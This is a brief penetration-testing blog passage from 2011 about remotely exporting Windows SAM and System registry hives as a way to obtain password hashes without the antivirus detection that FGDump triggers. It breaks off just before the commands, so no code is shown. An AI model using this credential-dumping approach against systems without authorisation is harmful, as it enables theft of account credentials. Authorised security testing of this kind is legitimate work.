September 2011

Remote Windows SAM Retrieval with VBScript

There's no denying that PSExec and FGDump are useful tools on a infrastructure penetration test. FGDump is a problem however, in the fact that it needs to inject into a running process (lsass.dll) and therefore is often blocked by antivirus. Whilst you can disable AV, this isn't advisable on a production server, especially if an alternative [safe] solution is available. Since XP, there has been an option to export both the SAM and System hives from a running Windows machine, without injecting into any running processes.

The commands are simple: